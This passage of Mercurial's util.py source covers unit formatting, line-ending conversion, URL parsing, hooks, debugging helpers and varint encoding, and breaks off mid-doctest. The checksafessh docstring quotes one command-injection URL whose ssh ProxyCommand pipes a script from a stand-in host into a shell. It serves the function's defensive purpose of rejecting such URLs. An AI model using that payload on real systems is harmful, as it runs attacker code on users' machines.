2802 2813 bytecount = unitcountfn(
2803 2814 (100, 1 << 30, _(b'%.0f GB')),
2804 2815 (10, 1 << 30, _(b'%.1f GB')),
2805 2816 (1, 1 << 30, _(b'%.2f GB')),
2806 2817 (100, 1 << 20, _(b'%.0f MB')),
2807 2818 (10, 1 << 20, _(b'%.1f MB')),
2808 2819 (1, 1 << 20, _(b'%.2f MB')),
2809 2820 (100, 1 << 10, _(b'%.0f KB')),
2810 2821 (10, 1 << 10, _(b'%.1f KB')),
2811 2822 (1, 1 << 10, _(b'%.2f KB')),
2812 2823 (1, 1, _(b'%.0f bytes')),
2813 2824 )
2814 2825
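# For instance (a sketch):
#
#     bytecount(999)       # -> b'999 bytes'
#     bytecount(1234567)   # -> b'1.18 MB'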
2815 2826
2816 2827 class transformingwriter(object):
2817 2828 """Writable file wrapper to transform data by function"""
2818 2829
2819 2830 def __init__(self, fp, encode):
2820 2831 self._fp = fp
2821 2832 self._encode = encode
2822 2833
2823 2834 def close(self):
2824 2835 self._fp.close()
2825 2836
2826 2837 def flush(self):
2827 2838 self._fp.flush()
2828 2839
2829 2840 def write(self, data):
2830 2841 return self._fp.write(self._encode(data))
2831 2842
2832 2843
2833 2844 # Matches a single EOL which can either be a CRLF where repeated CR
2834 2845 # are removed or a LF. We do not care about old Macintosh files, so a
2835 2846 # stray CR is an error.
2836 2847 _eolre = remod.compile(br'\r*\n')
2837 2848
2838 2849
2839 2850 def tolf(s):
2840 2851 # type: (bytes) -> bytes
2841 2852 return _eolre.sub(b'\n', s)
2842 2853
2843 2854
2844 2855 def tocrlf(s):
2845 2856 # type: (bytes) -> bytes
2846 2857 return _eolre.sub(b'\r\n', s)
2847 2858
2848 2859
2849 2860 def _crlfwriter(fp):
2850 2861 return transformingwriter(fp, tocrlf)
2851 2862
2852 2863
2853 2864 if pycompat.oslinesep == b'\r\n':
2854 2865 tonativeeol = tocrlf
2855 2866 fromnativeeol = tolf
2856 2867 nativeeolwriter = _crlfwriter
2857 2868 else:
2858 2869 tonativeeol = pycompat.identity
2859 2870 fromnativeeol = pycompat.identity
2860 2871 nativeeolwriter = pycompat.identity
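
# For instance (a sketch), independent of the platform defaults above:
#
#     tolf(b'a\r\nb\r\n')    # -> b'a\nb\n'
#     tocrlf(b'a\nb\n')      # -> b'a\r\nb\r\n'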
2861 2872
2862 2873 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2863 2874 3,
2864 2875 0,
2865 2876 ):
2866 2877 # There is an issue in CPython that some IO methods do not handle EINTR
2867 2878 # correctly. The following table shows what CPython version (and functions)
2868 2879 # are affected (buggy: has the EINTR bug, okay: otherwise):
2869 2880 #
2870 2881 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2871 2882 # --------------------------------------------------
2872 2883 # fp.__iter__ | buggy | buggy | okay
2873 2884 # fp.read* | buggy | okay [1] | okay
2874 2885 #
2875 2886 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2876 2887 #
2877 2888 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2878 2889 # like "read*" work fine, as we do not support Python < 2.7.4.
2879 2890 #
2880 2891 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2881 2892 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2882 2893 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2883 2894 # fp.__iter__ but not other fp.read* methods.
2884 2895 #
2885 2896 # On modern systems like Linux, the "read" syscall cannot be interrupted
2886 2897 # when reading "fast" files like on-disk files. So the EINTR issue only
2887 2898 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2888 2899 # files approximately as "fast" files and use the fast (unsafe) code path,
2889 2900 # to minimize the performance impact.
2890 2901
2891 2902 def iterfile(fp):
2892 2903 fastpath = True
2893 2904 if type(fp) is file:
2894 2905 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2895 2906 if fastpath:
2896 2907 return fp
2897 2908 else:
2898 2909 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 2910 return iter(fp.readline, b'')
2900 2911
2901 2912
2902 2913 else:
2903 2914 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2904 2915 def iterfile(fp):
2905 2916 return fp
2906 2917
2907 2918
2908 2919 def iterlines(iterator):
2909 2920 # type: (Iterator[bytes]) -> Iterator[bytes]
2910 2921 for chunk in iterator:
2911 2922 for line in chunk.splitlines():
2912 2923 yield line
2913 2924
2914 2925
2915 2926 def expandpath(path):
2916 2927 # type: (bytes) -> bytes
2917 2928 return os.path.expanduser(os.path.expandvars(path))
2918 2929
2919 2930
2920 2931 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2921 2932 """Return the result of interpolating items in the mapping into string s.
2922 2933
2923 2934 prefix is a single character string, or a two character string with
2924 2935 a backslash as the first character if the prefix needs to be escaped in
2925 2936 a regular expression.
2926 2937
2927 2938 fn is an optional function that will be applied to the replacement text
2928 2939 just before replacement.
2929 2940
2930 2941 escape_prefix is an optional flag that allows using doubled prefix for
2931 2942 its escaping.
2932 2943 """
2933 2944 fn = fn or (lambda s: s)
2934 2945 patterns = b'|'.join(mapping.keys())
2935 2946 if escape_prefix:
2936 2947 patterns += b'|' + prefix
2937 2948 if len(prefix) > 1:
2938 2949 prefix_char = prefix[1:]
2939 2950 else:
2940 2951 prefix_char = prefix
2941 2952 mapping[prefix_char] = prefix_char
2942 2953 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2943 2954 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944 2955
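# Illustrative call (a sketch): expand `$user`-style tokens, escaping the
# prefix for the regexp engine as the docstring describes.
#
#     interpolate(br'\$', {b'user': b'alice'}, b'hello $user')
#     # -> b'hello alice'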
2945 2956
2946 2957 def getport(port):
2947 2958 # type: (Union[bytes, int]) -> int
2948 2959 """Return the port for a given network service.
2949 2960
2950 2961 If port is an integer, it's returned as is. If it's a string, it's
2951 2962 looked up using socket.getservbyname(). If there's no matching
2952 2963 service, error.Abort is raised.
2953 2964 """
2954 2965 try:
2955 2966 return int(port)
2956 2967 except ValueError:
2957 2968 pass
2958 2969
2959 2970 try:
2960 2971 return socket.getservbyname(pycompat.sysstr(port))
2961 2972 except socket.error:
2962 2973 raise error.Abort(
2963 2974 _(b"no port number associated with service '%s'") % port
2964 2975 )
2965 2976
2966 2977
2967 2978 class url(object):
2968 2979 r"""Reliable URL parser.
2969 2980
2970 2981 This parses URLs and provides attributes for the following
2971 2982 components:
2972 2983
2973 2984 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2974 2985
2975 2986 Missing components are set to None. The only exception is
2976 2987 fragment, which is set to '' if present but empty.
2977 2988
2978 2989 If parsefragment is False, fragment is included in query. If
2979 2990 parsequery is False, query is included in path. If both are
2980 2991 False, both fragment and query are included in path.
2981 2992
2982 2993 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2983 2994
2984 2995 Note that for backward compatibility reasons, bundle URLs do not
2985 2996 take host names. That means 'bundle://../' has a path of '../'.
2986 2997
2987 2998 Examples:
2988 2999
2989 3000 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2990 3001 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2991 3002 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2992 3003 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2993 3004 >>> url(b'file:///home/joe/repo')
2994 3005 <url scheme: 'file', path: '/home/joe/repo'>
2995 3006 >>> url(b'file:///c:/temp/foo/')
2996 3007 <url scheme: 'file', path: 'c:/temp/foo/'>
2997 3008 >>> url(b'bundle:foo')
2998 3009 <url scheme: 'bundle', path: 'foo'>
2999 3010 >>> url(b'bundle://../foo')
3000 3011 <url scheme: 'bundle', path: '../foo'>
3001 3012 >>> url(br'c:\foo\bar')
3002 3013 <url path: 'c:\\foo\\bar'>
3003 3014 >>> url(br'\\blah\blah\blah')
3004 3015 <url path: '\\\\blah\\blah\\blah'>
3005 3016 >>> url(br'\\blah\blah\blah#baz')
3006 3017 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3007 3018 >>> url(br'file:///C:\users\me')
3008 3019 <url scheme: 'file', path: 'C:\\users\\me'>
3009 3020
3010 3021 Authentication credentials:
3011 3022
3012 3023 >>> url(b'ssh://joe:xyz@x/repo')
3013 3024 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3014 3025 >>> url(b'ssh://joe@x/repo')
3015 3026 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3016 3027
3017 3028 Query strings and fragments:
3018 3029
3019 3030 >>> url(b'http://host/a?b#c')
3020 3031 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3021 3032 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3022 3033 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3023 3034
3024 3035 Empty path:
3025 3036
3026 3037 >>> url(b'')
3027 3038 <url path: ''>
3028 3039 >>> url(b'#a')
3029 3040 <url path: '', fragment: 'a'>
3030 3041 >>> url(b'http://host/')
3031 3042 <url scheme: 'http', host: 'host', path: ''>
3032 3043 >>> url(b'http://host/#a')
3033 3044 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3034 3045
3035 3046 Only scheme:
3036 3047
3037 3048 >>> url(b'http:')
3038 3049 <url scheme: 'http'>
3039 3050 """
3040 3051
3041 3052 _safechars = b"!~*'()+"
3042 3053 _safepchars = b"/!~*'()+:\\"
3043 3054 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3044 3055
3045 3056 def __init__(self, path, parsequery=True, parsefragment=True):
3046 3057 # type: (bytes, bool, bool) -> None
3047 3058 # We slowly chomp away at path until we have only the path left
3048 3059 self.scheme = self.user = self.passwd = self.host = None
3049 3060 self.port = self.path = self.query = self.fragment = None
3050 3061 self._localpath = True
3051 3062 self._hostport = b''
3052 3063 self._origpath = path
3053 3064
3054 3065 if parsefragment and b'#' in path:
3055 3066 path, self.fragment = path.split(b'#', 1)
3056 3067
3057 3068 # special case for Windows drive letters and UNC paths
3058 3069 if hasdriveletter(path) or path.startswith(b'\\\\'):
3059 3070 self.path = path
3060 3071 return
3061 3072
3062 3073 # For compatibility reasons, we can't handle bundle paths as
3063 3074 # normal URLS
3064 3075 if path.startswith(b'bundle:'):
3065 3076 self.scheme = b'bundle'
3066 3077 path = path[7:]
3067 3078 if path.startswith(b'//'):
3068 3079 path = path[2:]
3069 3080 self.path = path
3070 3081 return
3071 3082
3072 3083 if self._matchscheme(path):
3073 3084 parts = path.split(b':', 1)
3074 3085 if parts[0]:
3075 3086 self.scheme, path = parts
3076 3087 self._localpath = False
3077 3088
3078 3089 if not path:
3079 3090 path = None
3080 3091 if self._localpath:
3081 3092 self.path = b''
3082 3093 return
3083 3094 else:
3084 3095 if self._localpath:
3085 3096 self.path = path
3086 3097 return
3087 3098
3088 3099 if parsequery and b'?' in path:
3089 3100 path, self.query = path.split(b'?', 1)
3090 3101 if not path:
3091 3102 path = None
3092 3103 if not self.query:
3093 3104 self.query = None
3094 3105
3095 3106 # // is required to specify a host/authority
3096 3107 if path and path.startswith(b'//'):
3097 3108 parts = path[2:].split(b'/', 1)
3098 3109 if len(parts) > 1:
3099 3110 self.host, path = parts
3100 3111 else:
3101 3112 self.host = parts[0]
3102 3113 path = None
3103 3114 if not self.host:
3104 3115 self.host = None
3105 3116 # path of file:///d is /d
3106 3117 # path of file:///d:/ is d:/, not /d:/
3107 3118 if path and not hasdriveletter(path):
3108 3119 path = b'/' + path
3109 3120
3110 3121 if self.host and b'@' in self.host:
3111 3122 self.user, self.host = self.host.rsplit(b'@', 1)
3112 3123 if b':' in self.user:
3113 3124 self.user, self.passwd = self.user.split(b':', 1)
3114 3125 if not self.host:
3115 3126 self.host = None
3116 3127
3117 3128 # Don't split on colons in IPv6 addresses without ports
3118 3129 if (
3119 3130 self.host
3120 3131 and b':' in self.host
3121 3132 and not (
3122 3133 self.host.startswith(b'[') and self.host.endswith(b']')
3123 3134 )
3124 3135 ):
3125 3136 self._hostport = self.host
3126 3137 self.host, self.port = self.host.rsplit(b':', 1)
3127 3138 if not self.host:
3128 3139 self.host = None
3129 3140
3130 3141 if (
3131 3142 self.host
3132 3143 and self.scheme == b'file'
3133 3144 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3134 3145 ):
3135 3146 raise error.Abort(
3136 3147 _(b'file:// URLs can only refer to localhost')
3137 3148 )
3138 3149
3139 3150 self.path = path
3140 3151
3141 3152 # leave the query string escaped
3142 3153 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3143 3154 v = getattr(self, a)
3144 3155 if v is not None:
3145 3156 setattr(self, a, urlreq.unquote(v))
3146 3157
3147 3158 def copy(self):
3148 3159 u = url(b'temporary useless value')
3149 3160 u.path = self.path
3150 3161 u.scheme = self.scheme
3151 3162 u.user = self.user
3152 3163 u.passwd = self.passwd
3153 3164 u.host = self.host
3154 3165 u.path = self.path
3155 3166 u.query = self.query
3156 3167 u.fragment = self.fragment
3157 3168 u._localpath = self._localpath
3158 3169 u._hostport = self._hostport
3159 3170 u._origpath = self._origpath
3160 3171 return u
3161 3172
3162 3173 @encoding.strmethod
3163 3174 def __repr__(self):
3164 3175 attrs = []
3165 3176 for a in (
3166 3177 b'scheme',
3167 3178 b'user',
3168 3179 b'passwd',
3169 3180 b'host',
3170 3181 b'port',
3171 3182 b'path',
3172 3183 b'query',
3173 3184 b'fragment',
3174 3185 ):
3175 3186 v = getattr(self, a)
3176 3187 if v is not None:
3177 3188 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3178 3189 return b'<url %s>' % b', '.join(attrs)
3179 3190
3180 3191 def __bytes__(self):
3181 3192 r"""Join the URL's components back into a URL string.
3182 3193
3183 3194 Examples:
3184 3195
3185 3196 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3186 3197 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3187 3198 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3188 3199 'http://user:pw@host:80/?foo=bar&baz=42'
3189 3200 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3190 3201 'http://user:pw@host:80/?foo=bar%3dbaz'
3191 3202 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3192 3203 'ssh://user:pw@[::1]:2200//home/joe#'
3193 3204 >>> bytes(url(b'http://localhost:80//'))
3194 3205 'http://localhost:80//'
3195 3206 >>> bytes(url(b'http://localhost:80/'))
3196 3207 'http://localhost:80/'
3197 3208 >>> bytes(url(b'http://localhost:80'))
3198 3209 'http://localhost:80/'
3199 3210 >>> bytes(url(b'bundle:foo'))
3200 3211 'bundle:foo'
3201 3212 >>> bytes(url(b'bundle://../foo'))
3202 3213 'bundle:../foo'
3203 3214 >>> bytes(url(b'path'))
3204 3215 'path'
3205 3216 >>> bytes(url(b'file:///tmp/foo/bar'))
3206 3217 'file:///tmp/foo/bar'
3207 3218 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3208 3219 'file:///c:/tmp/foo/bar'
3209 3220 >>> print(url(br'bundle:foo\bar'))
3210 3221 bundle:foo\bar
3211 3222 >>> print(url(br'file:///D:\data\hg'))
3212 3223 file:///D:\data\hg
3213 3224 """
3214 3225 if self._localpath:
3215 3226 s = self.path
3216 3227 if self.scheme == b'bundle':
3217 3228 s = b'bundle:' + s
3218 3229 if self.fragment:
3219 3230 s += b'#' + self.fragment
3220 3231 return s
3221 3232
3222 3233 s = self.scheme + b':'
3223 3234 if self.user or self.passwd or self.host:
3224 3235 s += b'//'
3225 3236 elif self.scheme and (
3226 3237 not self.path
3227 3238 or self.path.startswith(b'/')
3228 3239 or hasdriveletter(self.path)
3229 3240 ):
3230 3241 s += b'//'
3231 3242 if hasdriveletter(self.path):
3232 3243 s += b'/'
3233 3244 if self.user:
3234 3245 s += urlreq.quote(self.user, safe=self._safechars)
3235 3246 if self.passwd:
3236 3247 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3237 3248 if self.user or self.passwd:
3238 3249 s += b'@'
3239 3250 if self.host:
3240 3251 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3241 3252 s += urlreq.quote(self.host)
3242 3253 else:
3243 3254 s += self.host
3244 3255 if self.port:
3245 3256 s += b':' + urlreq.quote(self.port)
3246 3257 if self.host:
3247 3258 s += b'/'
3248 3259 if self.path:
3249 3260 # TODO: similar to the query string, we should not unescape the
3250 3261 # path when we store it, the path might contain '%2f' = '/',
3251 3262 # which we should *not* escape.
3252 3263 s += urlreq.quote(self.path, safe=self._safepchars)
3253 3264 if self.query:
3254 3265 # we store the query in escaped form.
3255 3266 s += b'?' + self.query
3256 3267 if self.fragment is not None:
3257 3268 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3258 3269 return s
3259 3270
3260 3271 __str__ = encoding.strmethod(__bytes__)
3261 3272
3262 3273 def authinfo(self):
3263 3274 user, passwd = self.user, self.passwd
3264 3275 try:
3265 3276 self.user, self.passwd = None, None
3266 3277 s = bytes(self)
3267 3278 finally:
3268 3279 self.user, self.passwd = user, passwd
3269 3280 if not self.user:
3270 3281 return (s, None)
3271 3282 # authinfo[1] is passed to urllib2 password manager, and its
3272 3283 # URIs must not contain credentials. The host is passed in the
3273 3284 # URIs list because Python < 2.4.3 uses only that to search for
3274 3285 # a password.
3275 3286 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3276 3287
3277 3288 def isabs(self):
3278 3289 if self.scheme and self.scheme != b'file':
3279 3290 return True # remote URL
3280 3291 if hasdriveletter(self.path):
3281 3292 return True # absolute for our purposes - can't be joined()
3282 3293 if self.path.startswith(br'\\'):
3283 3294 return True # Windows UNC path
3284 3295 if self.path.startswith(b'/'):
3285 3296 return True # POSIX-style
3286 3297 return False
3287 3298
3288 3299 def localpath(self):
3289 3300 # type: () -> bytes
3290 3301 if self.scheme == b'file' or self.scheme == b'bundle':
3291 3302 path = self.path or b'/'
3292 3303 # For Windows, we need to promote hosts containing drive
3293 3304 # letters to paths with drive letters.
3294 3305 if hasdriveletter(self._hostport):
3295 3306 path = self._hostport + b'/' + self.path
3296 3307 elif (
3297 3308 self.host is not None and self.path and not hasdriveletter(path)
3298 3309 ):
3299 3310 path = b'/' + path
3300 3311 return path
3301 3312 return self._origpath
3302 3313
3303 3314 def islocal(self):
3304 3315 '''whether localpath will return something that posixfile can open'''
3305 3316 return (
3306 3317 not self.scheme
3307 3318 or self.scheme == b'file'
3308 3319 or self.scheme == b'bundle'
3309 3320 )
3310 3321
3311 3322
3312 3323 def hasscheme(path):
3313 3324 # type: (bytes) -> bool
3314 3325 return bool(url(path).scheme) # cast to help pytype
3315 3326
3316 3327
3317 3328 def hasdriveletter(path):
3318 3329 # type: (bytes) -> bool
3319 3330 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3320 3331
3321 3332
3322 3333 def urllocalpath(path):
3323 3334 # type: (bytes) -> bytes
3324 3335 return url(path, parsequery=False, parsefragment=False).localpath()
3325 3336
3326 3337
3327 3338 def checksafessh(path):
3328 3339 # type: (bytes) -> None
3329 3340 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3330 3341
3331 3342 This is a sanity check for ssh urls. ssh will parse the first item as
3332 3343 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3333 3344 Let's prevent these potentially exploited urls entirely and warn the
3334 3345 user.
3335 3346
3336 3347 Raises an error.Abort when the url is unsafe.
3337 3348 """
3338 3349 path = urlreq.unquote(path)
3339 3350 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3340 3351 raise error.Abort(
3341 3352 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3342 3353 )
3343 3354
3344 3355
3345 3356 def hidepassword(u):
3346 3357 # type: (bytes) -> bytes
3347 3358 '''hide user credential in a url string'''
3348 3359 u = url(u)
3349 3360 if u.passwd:
3350 3361 u.passwd = b'***'
3351 3362 return bytes(u)
3352 3363
3353 3364
3354 3365 def removeauth(u):
3355 3366 # type: (bytes) -> bytes
3356 3367 '''remove all authentication information from a url string'''
3357 3368 u = url(u)
3358 3369 u.user = u.passwd = None
3359 3370 return bytes(u)
3360 3371
3361 3372
3362 3373 timecount = unitcountfn(
3363 3374 (1, 1e3, _(b'%.0f s')),
3364 3375 (100, 1, _(b'%.1f s')),
3365 3376 (10, 1, _(b'%.2f s')),
3366 3377 (1, 1, _(b'%.3f s')),
3367 3378 (100, 0.001, _(b'%.1f ms')),
3368 3379 (10, 0.001, _(b'%.2f ms')),
3369 3380 (1, 0.001, _(b'%.3f ms')),
3370 3381 (100, 0.000001, _(b'%.1f us')),
3371 3382 (10, 0.000001, _(b'%.2f us')),
3372 3383 (1, 0.000001, _(b'%.3f us')),
3373 3384 (100, 0.000000001, _(b'%.1f ns')),
3374 3385 (10, 0.000000001, _(b'%.2f ns')),
3375 3386 (1, 0.000000001, _(b'%.3f ns')),
3376 3387 )
3377 3388
3378 3389
3379 3390 @attr.s
3380 3391 class timedcmstats(object):
3381 3392 """Stats information produced by the timedcm context manager on entering."""
3382 3393
3383 3394 # the starting value of the timer as a float (meaning and resolution are
3384 3395 # platform dependent, see util.timer)
3385 3396 start = attr.ib(default=attr.Factory(lambda: timer()))
3386 3397 # the number of seconds as a floating point value; starts at 0, updated when
3387 3398 # the context is exited.
3388 3399 elapsed = attr.ib(default=0)
3389 3400 # the number of nested timedcm context managers.
3390 3401 level = attr.ib(default=1)
3391 3402
3392 3403 def __bytes__(self):
3393 3404 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3394 3405
3395 3406 __str__ = encoding.strmethod(__bytes__)
3396 3407
3397 3408
3398 3409 @contextlib.contextmanager
3399 3410 def timedcm(whencefmt, *whenceargs):
3400 3411 """A context manager that produces timing information for a given context.
3401 3412
3402 3413 On entering a timedcmstats instance is produced.
3403 3414
3404 3415 This context manager is reentrant.
3405 3416
3406 3417 """
3407 3418 # track nested context managers
3408 3419 timedcm._nested += 1
3409 3420 timing_stats = timedcmstats(level=timedcm._nested)
3410 3421 try:
3411 3422 with tracing.log(whencefmt, *whenceargs):
3412 3423 yield timing_stats
3413 3424 finally:
3414 3425 timing_stats.elapsed = timer() - timing_stats.start
3415 3426 timedcm._nested -= 1
3416 3427
3417 3428
3418 3429 timedcm._nested = 0
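
# Illustrative usage (a sketch; `load` stands in for the timed work):
#
#     with timedcm(b'loading %s', b'manifest') as stats:
#         load()
#     print(bytes(stats))   # e.g. b'12.3 ms'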
3419 3430
3420 3431
3421 3432 def timed(func):
3422 3433 """Report the execution time of a function call to stderr.
3423 3434
3424 3435 During development, use as a decorator when you need to measure
3425 3436 the cost of a function, e.g. as follows:
3426 3437
3427 3438 @util.timed
3428 3439 def foo(a, b, c):
3429 3440 pass
3430 3441 """
3431 3442
3432 3443 def wrapper(*args, **kwargs):
3433 3444 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3434 3445 result = func(*args, **kwargs)
3435 3446 stderr = procutil.stderr
3436 3447 stderr.write(
3437 3448 b'%s%s: %s\n'
3438 3449 % (
3439 3450 b' ' * time_stats.level * 2,
3440 3451 pycompat.bytestr(func.__name__),
3441 3452 time_stats,
3442 3453 )
3443 3454 )
3444 3455 return result
3445 3456
3446 3457 return wrapper
3447 3458
3448 3459
3449 3460 _sizeunits = (
3450 3461 (b'm', 2 ** 20),
3451 3462 (b'k', 2 ** 10),
3452 3463 (b'g', 2 ** 30),
3453 3464 (b'kb', 2 ** 10),
3454 3465 (b'mb', 2 ** 20),
3455 3466 (b'gb', 2 ** 30),
3456 3467 (b'b', 1),
3457 3468 )
3458 3469
3459 3470
3460 3471 def sizetoint(s):
3461 3472 # type: (bytes) -> int
3462 3473 """Convert a space specifier to a byte count.
3463 3474
3464 3475 >>> sizetoint(b'30')
3465 3476 30
3466 3477 >>> sizetoint(b'2.2kb')
3467 3478 2252
3468 3479 >>> sizetoint(b'6M')
3469 3480 6291456
3470 3481 """
3471 3482 t = s.strip().lower()
3472 3483 try:
3473 3484 for k, u in _sizeunits:
3474 3485 if t.endswith(k):
3475 3486 return int(float(t[: -len(k)]) * u)
3476 3487 return int(t)
3477 3488 except ValueError:
3478 3489 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479 3490
3480 3491
3481 3492 class hooks(object):
3482 3493 """A collection of hook functions that can be used to extend a
3483 3494 function's behavior. Hooks are called in lexicographic order,
3484 3495 based on the names of their sources."""
3485 3496
3486 3497 def __init__(self):
3487 3498 self._hooks = []
3488 3499
3489 3500 def add(self, source, hook):
3490 3501 self._hooks.append((source, hook))
3491 3502
3492 3503 def __call__(self, *args):
3493 3504 self._hooks.sort(key=lambda x: x[0])
3494 3505 results = []
3495 3506 for source, hook in self._hooks:
3496 3507 results.append(hook(*args))
3497 3508 return results
3498 3509
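# Illustrative usage (a sketch): hooks run sorted by source name.
#
#     h = hooks()
#     h.add(b'b-source', lambda x: x + 1)
#     h.add(b'a-source', lambda x: x * 2)
#     h(10)   # -> [20, 11]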
3499 3510
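# Example sketch: hooks registered under different source names run in
# lexicographic order of those names, regardless of registration order.
#
#     h = hooks()
#     h.add(b'zzz-ext', lambda x: x + 2)
#     h.add(b'aaa-ext', lambda x: x * 2)
#     h(10)  # calls the b'aaa-ext' hook first; returns [20, 12]
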
def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
    """Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    """
    entries = [
        (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
        for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
    ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(
    msg=b'stacktrace',
    skip=0,
    f=procutil.stderr,
    otherf=procutil.stdout,
    depth=0,
    prefix=b'',
):
    """Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    """
    if otherf:
        otherf.flush()
    f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
    for line in getstackframes(skip + 1, depth=depth):
        f.write(prefix + line)
    f.flush()


# convenient shortcut
dst = debugstacktrace

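# Example sketch: dropping dst(b'checking call site') into a suspect code
# path flushes stdout, then writes b'checking call site at:\n' to stderr,
# followed by one frame per line, each formatted as
# b' <filepath>:<lineno> in <function>\n'.
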
def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = b'%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = b'%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

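# Example sketch (assuming neither name exists in ctx): when the plain
# tagged name is already taken via `others`, the numeric suffix kicks in.
#
#     safename(b'foo', b'dest', ctx, others={b'foo~dest'})
#     # -> b'foo~dest~1'
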
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(
            _(b"stream ended unexpectedly (got %d bytes, expected %d)")
            % (len(s), n)
        )
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the value's binary representation, least significant
    group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    bits = value & 0x7F
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7F
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return b''.join(bytes)

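# Worked example: 1337 is 0b101_0011_1001. uvarintencode emits the low
# 7 bits first with the continuation bit set (0x80 | 0x39 == 0xb9), then
# the remaining bits (1337 >> 7 == 0x0a) without it, hence b'\xb9\n'.
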
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
